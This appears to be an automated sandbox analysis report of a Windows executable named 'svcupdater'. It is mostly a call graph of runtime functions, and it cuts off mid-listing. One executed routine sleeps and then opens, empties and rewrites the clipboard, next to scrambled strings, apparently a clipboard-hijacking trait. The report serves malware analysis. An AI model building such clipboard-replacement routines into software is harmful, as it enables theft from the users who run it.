23191 bed000 75 API calls 23190->23191 23192 beca3f 23191->23192 23193 bed570 43 API calls 23192->23193 23194 beca76 23193->23194 23195 be25f0 43 API calls 23194->23195 23196 becaf9 23195->23196 23197 bed000 75 API calls 23196->23197 23198 becb59 23197->23198 23199 bed570 43 API calls 23198->23199 23200 becb89 23199->23200 23201 be25f0 43 API calls 23200->23201 23202 becbfb __fread_nolock 23201->23202 23669 bed310 23202->23669 23204 becc37 Sleep 23675 bfdc1b GetSystemTimeAsFileTime 23204->23675 23210 bed440 43 API calls 23215 becc1e std::ios_base::_Ios_base_dtor 23210->23215 23211 be25f0 43 API calls 23219 becd45 23211->23219 23213 becfb0 43 API calls 23213->23219 23214 be2b90 53 API calls 23214->23219 23215->23204 23215->23210 23216 be25a0 43 API calls 23215->23216 23215->23219 23677 be1d90 23215->23677 23683 bed3c0 23215->23683 23688 be1f60 23215->23688 23707 be2c80 50 API calls 2 library calls 23215->23707 23710 becfb0 43 API calls 23215->23710 23216->23215 23218 be2630 43 API calls 23218->23219 23219->23211 23219->23213 23219->23214 23219->23215 23219->23218 23708 be21d0 43 API calls 3 library calls 23219->23708 23709 be25a0 43 API calls error_info_injector 23219->23709 23221->22870 23223 bf53c7 IsProcessorFeaturePresent 23222->23223 23224 bf53c6 23222->23224 23226 bf5e12 23223->23226 23224->22816 23865 bf5dd5 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23226->23865 23228 bf5ef5 23228->22816 23237->22919 23242 bf53d1 23238->23242 23240 bf53eb 23240->22936 23242->23240 23244 be1b30 Concurrency::cancel_current_task 23242->23244 23252 bfdcb6 23242->23252 23261 c01945 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23242->23261 23243 bf53f7 23243->23243 23244->23243 23259 bf691b RaiseException 23244->23259 23246 be1b4c 23260 bf63d1 42 API calls ___std_exception_copy 23246->23260 23248 be1b73 23248->22936 23250->22936 23257 c03ae9 __dosmaperr 23252->23257 23253 c03b27 23263 bfe7f3 14 API calls __dosmaperr 23253->23263 23254 c03b12 RtlAllocateHeap 23256 c03b25 23254->23256 23254->23257 23256->23242 23257->23253 23257->23254 23262 c01945 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23257->23262 23259->23246 23260->23248 23261->23242 23262->23257 23263->23256 23264->22948 23266->22955 23268->22964 23270 be3a20 43 API calls 23269->23270 23271 be8519 23270->23271 23272 bf53cc std::_Facet_Register 43 API calls 23271->23272 23273 be8520 23272->23273 23313 bf4400 23273->23313 23275 be8537 23325 be8760 23275->23325 23277 be440e 23280 be7570 23277->23280 23278 be8568 23278->23277 23279 be3a20 43 API calls 23278->23279 23279->23277 23281 bf53cc std::_Facet_Register 43 API calls 23280->23281 23282 be75b0 23281->23282 23283 bf4400 std::locale::_Init 47 API calls 23282->23283 23284 be4447 23283->23284 23284->22972 23285 bf47ac 23284->23285 23289 bf4708 23285->23289 23286 be445e 23286->22972 23286->22976 23287 bf4761 23293 bf4768 23287->23293 23372 bfe0bc 23287->23372 23289->23286 23289->23287 23291 bfe0bc 44 API calls 23289->23291 23291->23287 23293->23286 23389 bfa477 23293->23389 23295->22980 23296->22987 23298 be3a3a 23297->23298 23298->22987 23300 be3a52 23298->23300 23544 bf691b RaiseException 23298->23544 23545 be3930 43 API calls 3 library calls 23300->23545 23302 be3a88 23546 bf691b RaiseException 23302->23546 23304 be3a97 23547 bf63d1 42 API calls ___std_exception_copy 23304->23547 23306 be3ac4 23306->22987 23307->22983 23309 be5be2 23308->23309 23311 be5c0d error_info_injector 23309->23311 23548 be7480 23309->23548 23311->22981 23314 bf440c __EH_prolog3 23313->23314 23348 bf421d 23314->23348 23319 bf442a 23362 bf4588 43 API calls std::locale::_Setgloballocale 23319->23362 23320 bf4488 std::locale::_Init 23320->23275 23322 bf4432 23363 bf4358 15 API calls 2 library calls 23322->23363 23324 bf4448 23354 bf4275 23324->23354 23326 bf421d std::_Lockit::_Lockit 7 API calls 23325->23326 23327 be879b 23326->23327 23328 bf421d std::_Lockit::_Lockit 7 API calls 23327->23328 23333 be87de 23327->23333 23330 be87be 23328->23330 23329 be8828 23331 bf4275 std::_Lockit::~_Lockit 2 API calls 23329->23331 23334 bf4275 std::_Lockit::~_Lockit 2 API calls 23330->23334 23332 be8868 23331->23332 23335 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23332->23335 23333->23329 23368 be35e0 73 API calls 7 library calls 23333->23368 23334->23333 23336 be8882 23335->23336 23336->23278 23338 be8838 23339 be8886 23338->23339 23340 be8840 23338->23340 23370 be33b0 43 API calls 2 library calls 23339->23370 23369 bf43ce 43 API calls std::_Facet_Register 23340->23369 23343 be888b 23344 be8760 73 API calls 23343->23344 23346 be88df 23344->23346 23371 be98e0 43 API calls 23346->23371 23347 be891b 23347->23278 23349 bf422c 23348->23349 23350 bf4233 23348->23350 23364 bfdd61 6 API calls 2 library calls 23349->23364 23352 bf4231 23350->23352 23365 bf4c51 EnterCriticalSection 23350->23365 23352->23324 23361 bf4565 43 API calls 2 library calls 23352->23361 23355 bfdd6f 23354->23355 23356 bf427f 23354->23356 23367 bfdd4a LeaveCriticalSection 23355->23367 23357 bf4292 23356->23357 23366 bf4c5f LeaveCriticalSection 23356->23366 23357->23320 23360 bfdd76 23360->23320 23361->23319 23362->23322 23363->23324 23364->23352 23365->23352 23366->23357 23367->23360 23368->23338 23369->23329 23370->23343 23371->23347 23373 bfe005 __FrameHandler3::FrameUnwindToState 23372->23373 23374 bfe018 23373->23374 23376 bfe038 23373->23376 23404 bfe7f3 14 API calls __dosmaperr 23374->23404 23378 bfe03d 23376->23378 23379 bfe04a 23376->23379 23377 bfe01d 23405 bf9def 41 API calls ___std_exception_copy 23377->23405 23406 bfe7f3 14 API calls __dosmaperr 23378->23406 23396 c03943 23379->23396 23383 bf4785 23383->23286 23395 bfdbd6 68 API calls ___std_exception_copy 23383->23395 23385 bfe05a 23407 bfe7f3 14 API calls __dosmaperr 23385->23407 23386 bfe067 23408 bfe0a5 LeaveCriticalSection __fread_nolock 23386->23408 23390 bfa48a ___std_exception_copy 23389->23390 23434 bfa352 23390->23434 23392 bfa496 23445 bf9b2b 41 API calls ___std_exception_copy 23392->23445 23394 bfa4a2 23394->23286 23395->23293 23397 c0394f __FrameHandler3::FrameUnwindToState 23396->23397 23409 bfdd02 EnterCriticalSection 23397->23409 23399 c0395d 23410 c039e7 23399->23410 23404->23377 23405->23383 23406->23383 23407->23383 23408->23383 23409->23399 23417 c03a0a 23410->23417 23411 c0396a 23424 c039a3 23411->23424 23412 c03a62 23429 c02a9c 14 API calls 2 library calls 23412->23429 23415 c03a6b 23430 c03705 14 API calls __dosmaperr 23415->23430 23417->23411 23417->23412 23427 bfc413 EnterCriticalSection 23417->23427 23428 bfc427 LeaveCriticalSection 23417->23428 23418 c03a74 23418->23411 23431 c0525c 6 API calls std::_Locinfo::_Locinfo_dtor 23418->23431 23420 c03a93 23432 bfc413 EnterCriticalSection 23420->23432 23423 c03aa6 23423->23411 23433 bfdd4a LeaveCriticalSection 23424->23433 23426 bfe053 23426->23385 23426->23386 23427->23417 23428->23417 23429->23415 23430->23418 23431->23420 23432->23423 23433->23426 23435 bfa35e __FrameHandler3::FrameUnwindToState 23434->23435 23436 bfa38b 23435->23436 23437 bfa368 23435->23437 23444 bfa383 23436->23444 23446 bfc413 EnterCriticalSection 23436->23446 23461 bf9d72 41 API calls 2 library calls 23437->23461 23440 bfa3a9 23447 bfa3e9 23440->23447 23442 bfa3b6 23462 bfa3e1 LeaveCriticalSection __fread_nolock 23442->23462 23444->23392 23445->23394 23446->23440 23448 bfa419 23447->23448 23449 bfa3f6 23447->23449 23459 bfa411 23448->23459 23463 bfa226 23448->23463 23469 bf9d72 41 API calls 2 library calls 23449->23469 23454 bfa439 23471 c0262b 23454->23471 23456 bfa445 23478 c037d0 46 API calls ___std_exception_copy 23456->23478 23458 bfa44c 23458->23459 23479 c03705 14 API calls __dosmaperr 23458->23479 23459->23442 23461->23444 23462->23444 23464 bfa23f 23463->23464 23465 bfa266 23463->23465 23464->23465 23466 c0262b __fread_nolock 41 API calls 23464->23466 23470 c03aa9 14 API calls ___free_lconv_mon 23465->23470 23467 bfa25b 23466->23467 23480 c033fd 23467->23480 23469->23459 23470->23454 23472 c02637 23471->23472 23473 c0264c 23471->23473 23542 bfe7f3 14 API calls __dosmaperr 23472->23542 23473->23456 23475 c0263c 23543 bf9def 41 API calls ___std_exception_copy 23475->23543 23477 c02647 23477->23456 23478->23458 23479->23459 23482 c03409 __FrameHandler3::FrameUnwindToState 23480->23482 23481 c03411 23481->23465 23482->23481 23483 c034cd 23482->23483 23485 c0345e 23482->23485 23521 bf9d72 41 API calls 2 library calls 23483->23521 23491 c0b43a EnterCriticalSection 23485->23491 23487 c03464 23488 c03481 23487->23488 23492 c03505 23487->23492 23520 c034c5 LeaveCriticalSection __wsopen_s 23488->23520 23491->23487 23493 c0352a 23492->23493 23497 c0354d __fread_nolock 23492->23497 23494 c0352e 23493->23494 23496 c0358c 23493->23496 23536 bf9d72 41 API calls 2 library calls 23494->23536 23498 c035a3 23496->23498 23537 c07253 43 API calls __fread_nolock 23496->23537 23497->23488 23522 c03052 23498->23522 23502 c035f3 23504 c03656 WriteFile 23502->23504 23505 c03607 23502->23505 23503 c035b3 23506 c035ba 23503->23506 23507 c035dd 23503->23507 23508 c03678 GetLastError 23504->23508 23519 c035ee 23504->23519 23510 c03644 23505->23510 23511 c0360f 23505->23511 23506->23497 23538 c02fea 6 API calls __wsopen_s 23506->23538 23539 c02c18 47 API calls 4 library calls 23507->23539 23508->23519 23529 c030d0 23510->23529 23512 c03632 23511->23512 23513 c03614 23511->23513 23541 c03294 8 API calls 3 library calls 23512->23541 23513->23497 23516 c0361d 23513->23516 23540 c031ab 7 API calls 2 library calls 23516->23540 23519->23497 23520->23481 23521->23481 23523 c0e037 __fread_nolock 41 API calls 23522->23523 23524 c03064 23523->23524 23525 c03092 23524->23525 23526 bfbff0 std::_Locinfo::_Locinfo_dtor 41 API calls 23524->23526 23528 c030c5 23524->23528 23527 c030ac GetConsoleMode 23525->23527 23525->23528 23526->23525 23527->23528 23528->23502 23528->23503 23532 c030df __wsopen_s 23529->23532 23530 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23531 c031a9 23530->23531 23531->23497 23533 c0314f WriteFile 23532->23533 23535 c03190 23532->23535 23533->23532 23534 c03192 GetLastError 23533->23534 23534->23535 23535->23530 23536->23497 23537->23498 23538->23497 23539->23519 23540->23497 23541->23519 23542->23475 23543->23477 23544->23300 23545->23302 23546->23304 23547->23306 23549 be748f 23548->23549 23550 be74cb 23548->23550 23554 be72a0 23549->23554 23550->23311 23552 be74b7 23553 bfa477 71 API calls 23552->23553 23553->23550 23555 be72bd 23554->23555 23556 be735a 23554->23556 23555->23556 23562 be72c7 23555->23562 23557 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23556->23557 23558 be7367 23557->23558 23558->23552 23559 be7348 23560 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23559->23560 23561 be7356 23560->23561 23561->23552 23562->23559 23563 be72f6 23562->23563 23564 be7310 23562->23564 23563->23559 23566 be72fb 23563->23566 23565 be7331 23564->23565 23573 bfc72b 69 API calls ___std_exception_copy 23564->23573 23569 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23565->23569 23567 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23566->23567 23570 be730c 23567->23570 23572 be7344 23569->23572 23570->23552 23571 be732a 23571->23559 23571->23565 23572->23552 23573->23571 23576->23004 23577->23008 23578->23011 23579->23014 23581->23028 23584 be5f55 23583->23584 23586 be5f6e 23584->23586 23595 be82e0 43 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 23584->23595 23589 be5fc6 23586->23589 23596 be8b80 67 API calls 7 library calls 23586->23596 23587 be3a20 43 API calls 23591 be6085 23587->23591 23589->23587 23590 be41f7 23590->23048 23591->23590 23597 be8410 43 API calls 23591->23597 23593->23047 23594->23057 23595->23586 23596->23589 23597->23590 23599 bf4400 std::locale::_Init 47 API calls 23598->23599 23600 be358c 23599->23600 23601 bed1c0 23600->23601 23602 bf421d std::_Lockit::_Lockit 7 API calls 23601->23602 23603 bed200 23602->23603 23604 bf421d std::_Lockit::_Lockit 7 API calls 23603->23604 23607 bed245 23603->23607 23605 bed225 23604->23605 23608 bf4275 std::_Lockit::~_Lockit 2 API calls 23605->23608 23606 bed264 23609 bf4275 std::_Lockit::~_Lockit 2 API calls 23606->23609 23607->23606 23711 bed980 67 API calls 8 library calls 23607->23711 23608->23607 23610 bed276 23609->23610 23612 be8760 73 API calls 23610->23612 23614 bed281 23612->23614 23613 bed2d3 23616 bed2db 23613->23616 23617 bed300 23613->23617 23615 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23614->23615 23618 bed29f 23615->23618 23712 bf43ce 43 API calls std::_Facet_Register 23616->23712 23713 be33b0 43 API calls 2 library calls 23617->23713 23618->23062 23621 bed305 23623 bf4400 std::locale::_Init 47 API calls 23622->23623 23624 bed04a 23623->23624 23625 bf421d std::_Lockit::_Lockit 7 API calls 23624->23625 23626 bed061 23625->23626 23627 bf421d std::_Lockit::_Lockit 7 API calls 23626->23627 23631 bed0a3 23626->23631 23628 bed083 23627->23628 23632 bf4275 std::_Lockit::~_Lockit 2 API calls 23628->23632 23629 bed0c2 23630 bf4275 std::_Lockit::~_Lockit 2 API calls 23629->23630 23633 bed0d1 23630->23633 23631->23629 23714 bed980 67 API calls 8 library calls 23631->23714 23632->23631 23634 be8760 73 API calls 23633->23634 23637 bed0dc 23634->23637 23636 bed130 23638 bed15d 23636->23638 23639 bed138 23636->23639 23640 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23637->23640 23716 be33b0 43 API calls 2 library calls 23638->23716 23715 bf43ce 43 API calls std::_Facet_Register 23639->23715 23642 bea11f 23640->23642 23645 bed570 23642->23645 23644 bed162 23646 bed5a9 __fread_nolock 23645->23646 23647 bf53cc std::_Facet_Register 43 API calls 23646->23647 23648 bed5f9 23647->23648 23717 bedc60 23648->23717 23650 bed68d 23651 bed6c9 error_info_injector 23650->23651 23653 bed6f0 23650->23653 23652 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23651->23652 23654 bed6ea 23652->23654 23734 bf9dff 41 API calls 2 library calls 23653->23734 23654->23066 23661 be2613 23660->23661 23661->23661 23662 be2830 43 API calls 23661->23662 23663 be2625 23662->23663 23663->23068 23665 bed000 75 API calls 23664->23665 23666 becf68 23665->23666 23667 bed570 43 API calls 23666->23667 23668 becf8c 23667->23668 23668->23070 23670 bed351 23669->23670 23671 bed366 23670->23671 23841 bedc20 75 API calls 23670->23841 23837 bed392 23671->23837 23676 bfdc54 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23675->23676 23676->23215 23678 be1dab __wsopen_s 23677->23678 23679 be2830 43 API calls 23678->23679 23680 be1ec8 23679->23680 23843 be2630 23680->23843 23682 be1ede 23684 bed000 75 API calls 23683->23684 23685 bed3fb 23684->23685 23686 bed570 43 API calls 23685->23686 23687 bed421 23686->23687 23687->23215 23689 be1f7b __wsopen_s 23688->23689 23690 be21c2 23689->23690 23691 be2001 23689->23691 23863 be1bd0 43 API calls 23690->23863 23692 be2a70 43 API calls 23691->23692 23694 be2030 23692->23694 23696 be2530 43 API calls 23694->23696 23695 be21c7 23864 bf9dff 41 API calls 2 library calls 23695->23864 23698 be2091 23696->23698 23700 be2760 43 API calls 23698->23700 23701 be20f6 23700->23701 23702 be2630 43 API calls 23701->23702 23703 be2109 error_info_injector 23702->23703 23703->23695 23704 be219e error_info_injector 23703->23704 23705 bf53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23704->23705 23706 be21be 23705->23706 23706->23215 23707->23215 23708->23219 23709->23215 23710->23215 23711->23613 23712->23606 23713->23621 23714->23636 23715->23629 23716->23644 23718 bf53cc std::_Facet_Register 43 API calls 23717->23718 23719 bedca0 23718->23719 23735 bee3c0 23719->23735 23722 bedddf 23752 bee160 43 API calls 23722->23752 23724 bedd17 23725 bf53cc std::_Facet_Register 43 API calls 23724->23725 23726 bedd47 23725->23726 23751 bef320 43 API calls std::_Facet_Register 23726->23751 23732 beddac 23732->23650 23753 beee90 23735->23753 23738 bee402 23741 bf53cc std::_Facet_Register 43 API calls 23738->23741 23739 bedd09 23739->23722 23739->23724 23742 bee412 23741->23742 23745 bf53cc std::_Facet_Register 43 API calls 23742->23745 23743 bee3fa 23772 bee5f0 43 API calls std::_Facet_Register 23743->23772 23746 bee476 23745->23746 23746->23739 23747 beee90 43 API calls 23746->23747 23749 bf53cc std::_Facet_Register 43 API calls 23746->23749 23773 bef320 43 API calls std::_Facet_Register 23746->23773 23774 bee5f0 43 API calls std::_Facet_Register 23746->23774 23747->23746 23749->23746 23751->23732 23754 bee3e1 23753->23754 23765 beeea3 23753->23765 23754->23738 23754->23739 23771 bef320 43 API calls std::_Facet_Register 23754->23771 23755 bef304 23809 bee160 43 API calls 23755->23809 23757 bef30b 23810 bee160 43 API calls 23757->23810 23760 bef320 43 API calls 23760->23765 23761 bef312 23811 bee160 43 API calls 23761->23811 23764 bef2fd 23808 bee160 43 API calls 23764->23808 23765->23754 23765->23755 23765->23757 23765->23760 23765->23761 23765->23764 23775 befe10 23765->23775 23804 befb60 43 API calls std::_Facet_Register 23765->23804 23805 befa30 43 API calls std::_Facet_Register 23765->23805 23806 befcb0 43 API calls 23765->23806 23807 bf0040 43 API calls 4 library calls 23765->23807 23771->23743 23772->23738 23773->23746 23774->23746 23777 befe2d 23775->23777 23781 befe36 23775->23781 23776 bf001a 23776->23765 23777->23776 23777->23781 23831 bf22f0 43 API calls 23777->23831 23780 beff5e 23782 bf0020 23780->23782 23789 beff69 23780->23789 23812 bf1b80 23781->23812 23833 bee160 43 API calls 23782->23833 23784 bf0027 23834 bee160 43 API calls 23784->23834 23785 bf002e 23835 bee160 43 API calls 23785->23835 23788 beff75 23788->23781 23788->23785 23789->23788 23832 bf22f0 43 API calls 23789->23832 23792 beffd8 23792->23784 23792->23788 23804->23765 23805->23765 23806->23765 23807->23765 23813 bf1b94 23812->23813 23816 bf1bb3 23812->23816 23813->23816 23836 bf0040 43 API calls 4 library calls 23813->23836 23815 bf1dac 23817 bf53cc std::_Facet_Register 43 API calls 23815->23817 23816->23815 23818 bf1bda 23816->23818 23820 bf1db3 23817->23820 23819 bf53cc std::_Facet_Register 43 API calls 23818->23819 23822 bf1be1 23819->23822 23821 bf53cc std::_Facet_Register 43 API calls 23820->23821 23830 bf1cf3 23821->23830 23823 bf53cc std::_Facet_Register 43 API calls 23822->23823 23824 bf1c1f 23823->23824 23825 bf53cc std::_Facet_Register 43 API calls 23824->23825 23826 bf1c6a 23825->23826 23827 bf53cc std::_Facet_Register 43 API calls 23826->23827 23828 bf1cb5 23827->23828 23829 bf53cc std::_Facet_Register 43 API calls 23828->23829 23829->23830 23830->23776 23831->23780 23832->23792 23836->23816 23838 bed377 23837->23838 23840 bed396 23837->23840 23838->23215 23840->23838 23842 bece50 41 API calls error_info_injector 23840->23842 23841->23670 23842->23840 23844 be265a 23843->23844 23845 be266e 23844->23845 23846 be2719 23844->23846 23847 be267a _Yarn 23845->23847 23849 be26a1 23845->23849 23852 be26dc 23845->23852 23853 be26e5 23845->23853 23860 be1bd0 43 API calls 23846->23860 23847->23682 23854 bf53cc std::_Facet_Register 43 API calls 23849->23854 23850 be271e 23861 be1b30 43 API calls 2 library calls 23850->23861 23852->23849 23852->23850 23857 bf53cc std::_Facet_Register 43 API calls 23853->23857 23859 be26bd _Yarn 23853->23859 23855 be26b4 23854->23855 23855->23859 23862 bf9dff 41 API calls 2 library calls 23855->23862 23857->23859 23859->23682 23861->23855 23865->23228 23866 c07baf 23871 c07985 23866->23871 23869 c07bee 23872 c079a4 23871->23872 23873 c079b7 23872->23873 23881 c079cc 23872->23881 23891 bfe7f3 14 API calls __dosmaperr 23873->23891 23875 c079bc 23892 bf9def 41 API calls ___std_exception_copy 23875->23892 23877 c079c7 23877->23869 23888 c104b7 23877->23888 23879 c07b9d 23897 bf9def 41 API calls ___std_exception_copy 23879->23897 23886 c07aec 23881->23886 23893 c0fd49 41 API calls 2 library calls 23881->23893 23883 c07b3c 23883->23886 23894 c0fd49 41 API calls 2 library calls 23883->23894 23885 c07b5a 23885->23886 23895 c0fd49 41 API calls 2 library calls 23885->23895 23886->23877 23896 bfe7f3 14 API calls __dosmaperr 23886->23896 23898 c0fe81 23888->23898 23891->23875 23892->23877 23893->23883 23894->23885 23895->23886 23896->23879 23897->23877 23900 c0fe8d __FrameHandler3::FrameUnwindToState 23898->23900 23899 c0fe94 23918 bfe7f3 14 API calls __dosmaperr 23899->23918 23900->23899 23902 c0febf 23900->23902 23909 c10449 23902->23909 23903 c0fe99 23919 bf9def 41 API calls ___std_exception_copy 23903->23919 23908 c0fea3 23908->23869 23921 c09d4a 23909->23921 23914 c1047f 23917 c0fee3 23914->23917 23975 c03705 14 API calls __dosmaperr 23914->23975 23920 c0ff16 LeaveCriticalSection __wsopen_s 23917->23920 23918->23903 23919->23908 23920->23908 23976 bfe806 23921->23976 23925 c09d6e 23926 bff13d 23925->23926 23988 bfefc9 23926->23988 23929 c104d7 23930 c104f4 23929->23930 23931 c10522 23930->23931 23932 c10509 23930->23932 24013 c0b512 23931->24013 24027 bfe7e0 14 API calls __dosmaperr 23932->24027 23936 c10530 24029 bfe7e0 14 API calls __dosmaperr 23936->24029 23937 c10547 24026 c10190 CreateFileW 23937->24026 23941 c10535 24030 bfe7f3 14 API calls __dosmaperr 23941->24030 23942 c1051b 23942->23914 23944 c105fd GetFileType 23947 c10608 GetLastError 23944->23947 23948 c1064f 23944->23948 23945 c1050e 24028 bfe7f3 14 API calls __dosmaperr 23945->24028 23946 c105d2 GetLastError 24032 bfe799 14 API calls __dosmaperr 23946->24032 24033 bfe799 14 API calls __dosmaperr 23947->24033 24035 c0b45d 15 API calls 2 library calls 23948->24035 23950 c10580 23950->23944 23950->23946 24031 c10190 CreateFileW 23950->24031 23952 c10616 CloseHandle 23952->23945 23954 c1063f 23952->23954 24034 bfe7f3 14 API calls __dosmaperr 23954->24034 23956 c105c5 23956->23944 23956->23946 23958 c10670 23960 c106bc 23958->23960 24036 c1039f 75 API calls 3 library calls 23958->24036 23959 c10644 23959->23945 23964 c106c3 23960->23964 24038 c0ff42 75 API calls 4 library calls 23960->24038 23963 c106f1 23963->23964 23965 c106ff 23963->23965 24037 c03873 44 API calls 2 library calls 23964->24037 23965->23942 23967 c1077b CloseHandle 23965->23967 24039 c10190 CreateFileW 23967->24039 23969 c107a6 23970 c107b0 GetLastError 23969->23970 23971 c107dc 23969->23971 24040 bfe799 14 API calls __dosmaperr 23970->24040 23971->23942 23973 c107bc 24041 c0b625 15 API calls 2 library calls 23973->24041 23975->23917 23977 bfe824 23976->23977 23983 bfe81d 23976->23983 23977->23983 23985 c02340 41 API calls 3 library calls 23977->23985 23979 bfe845 23986 c03b37 41 API calls __Strxfrm 23979->23986 23981 bfe85b 23987 c03b95 41 API calls __wsopen_s 23981->23987 23983->23925 23984 c05012 5 API calls std::_Locinfo::_Locinfo_dtor 23983->23984 23984->23925 23985->23979 23986->23981 23987->23983 23989 bfefd7 23988->23989 23990 bfeff1 23988->23990 24006 bff17e 14 API calls ___free_lconv_mon 23989->24006 23992 bfeff8 23990->23992 23993 bff017 23990->23993 24005 bfefe1 23992->24005 24007 bff1bf 15 API calls __wsopen_s 23992->24007 24008 c09a65 MultiByteToWideChar 23993->24008 23996 bff026 23997 bff02d GetLastError 23996->23997 23999 bff053 23996->23999 24011 bff1bf 15 API calls __wsopen_s 23996->24011 24009 bfe799 14 API calls __dosmaperr 23997->24009 23999->24005 24012 c09a65 MultiByteToWideChar 23999->24012 24001 bff039 24010 bfe7f3 14 API calls __dosmaperr 24001->24010 24003 bff06a 24003->23997 24003->24005 24005->23914 24005->23929 24006->24005 24007->24005 24008->23996 24009->24001 24010->24005 24011->23999 24012->24003 24014 c0b51e __FrameHandler3::FrameUnwindToState 24013->24014 24042 bfdd02 EnterCriticalSection 24014->24042 24016 c0b54a 24046 c0b2ec 15 API calls 3 library calls 24016->24046 24017 c0b525 24017->24016 24022 c0b5b9 EnterCriticalSection 24017->24022 24025 c0b56c 24017->24025 24021 c0b54f 24021->24025 24047 c0b43a EnterCriticalSection 24021->24047 24023 c0b5c6 LeaveCriticalSection 24022->24023 24022->24025 24023->24017 24043 c0b61c 24025->24043 24026->23950 24027->23945 24028->23942 24029->23941 24030->23945 24031->23956 24032->23945 24033->23952 24034->23959 24035->23958 24036->23960 24037->23942 24038->23963 24039->23969 24040->23973 24041->23971 24042->24017 24048 bfdd4a LeaveCriticalSection 24043->24048 24045 c0b58c 24045->23936 24045->23937 24046->24021 24047->24025 24048->24045

                                                                                                    Executed Functions

                                                                                                    Function 00BEA030 Relevance: 86.6, APIs: 1, Strings: 55, Instructions: 2556sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00BE3560: std::locale::_Init.LIBCPMT ref: 00BE3587
                                                                                                      • Part of subcall function 00BED1C0: std::_Lockit::_Lockit.LIBCPMT ref: 00BED1FB
                                                                                                      • Part of subcall function 00BED1C0: std::_Lockit::_Lockit.LIBCPMT ref: 00BED220
                                                                                                      • Part of subcall function 00BED1C0: std::_Lockit::~_Lockit.LIBCPMT ref: 00BED240
                                                                                                      • Part of subcall function 00BED1C0: std::_Lockit::~_Lockit.LIBCPMT ref: 00BED271
                                                                                                    • Sleep.KERNELBASE(00000032,00000001,2F4C7F60,?,00000033), ref: 00BECC39
                                                                                                      • Part of subcall function 00BE2B90: OpenClipboard.USER32(00000000), ref: 00BE2B98
                                                                                                      • Part of subcall function 00BE2B90: EmptyClipboard.USER32 ref: 00BE2BA6
                                                                                                      • Part of subcall function 00BE2B90: CloseClipboard.USER32 ref: 00BE2BB0
                                                                                                      • Part of subcall function 00BE2B90: GlobalAlloc.KERNEL32(00002000,?), ref: 00BE2BC5
                                                                                                      • Part of subcall function 00BE2B90: CloseClipboard.USER32 ref: 00BE2BD1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardLockitstd::_$CloseLockit::_Lockit::~_$AllocEmptyGlobalInitOpenSleepstd::locale::_
                                                                                                    • String ID: i/o$" yx$$ypp$%k2$&$&h1$&|u$(,a8$)5!E$*d=$+?[}$1%Ag$3$55{"$7~8x$:(xv$<$<X~6$=x!$>C4^$>vw8$AOFG$D$JBV^$Mk#($QkAx$SWT2$V+\6$VH5B$WGD$\$\ACE$`;qi$`<l2$a$c++e$d$e[`$f$m4$n2k$o1-$p?O$r497$reid$rv;b$u$u$u,$w+{%$x#-#$x&:$y $y{{=$}qb1
                                                                                                    • API String ID: 769801142-2535262029
                                                                                                    • Opcode ID: ba8a71fb7293191a02dc96bd216266deb66eeb7c609a9715a25af8e80ddefb51
                                                                                                    • Instruction ID: 5e5e39d44ce6d251120d1f9cb211f4740891c1625be37bd9d9bca3a8976fe35c
                                                                                                    • Opcode Fuzzy Hash: ba8a71fb7293191a02dc96bd216266deb66eeb7c609a9715a25af8e80ddefb51
                                                                                                    • Instruction Fuzzy Hash: EB538A31C096E899DB25DB648C51BFEBBB1AF2A305F0441C9E58D26183EB742BC9CF15
                                                                                                    Function 00BE46E0 Relevance: 14.7, APIs: 4, Strings: 4, Instructions: 659COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 980 be46e0-be4714 call be3b60 983 be471a-be4721 call be3f90 980->983 984 be5027-be5043 call bf53be 980->984 983->984 989 be4727-be4760 SHGetFolderPathA 983->989 990 be4763-be4768 989->990 990->990 991 be476a-be47af call be2830 990->991 994 be47b0-be47b5 991->994 994->994 995 be47b7-be47ca 994->995 996 be5044 call be1bd0 995->996 997 be47d0-be4831 call be2a70 call be2760 call be6190 995->997 1000 be5049 call bf9dff 996->1000 1010 be4862-be488a 997->1010 1011 be4833-be4842 997->1011 1004 be504e call be1bd0 1000->1004 1009 be5053 call bf9dff 1004->1009 1017 be5058 call be1bd0 1009->1017 1015 be488c-be489b 1010->1015 1016 be48bb-be48ea 1010->1016 1013 be4858-be485f call bf564d 1011->1013 1014 be4844-be4852 1011->1014 1013->1010 1014->1000 1014->1013 1019 be489d-be48ab 1015->1019 1020 be48b1-be48b8 call bf564d 1015->1020 1022 be48f0-be48f5 1016->1022 1025 be505d call bf9dff 1017->1025 1019->1000 1019->1020 1020->1016 1022->1022 1026 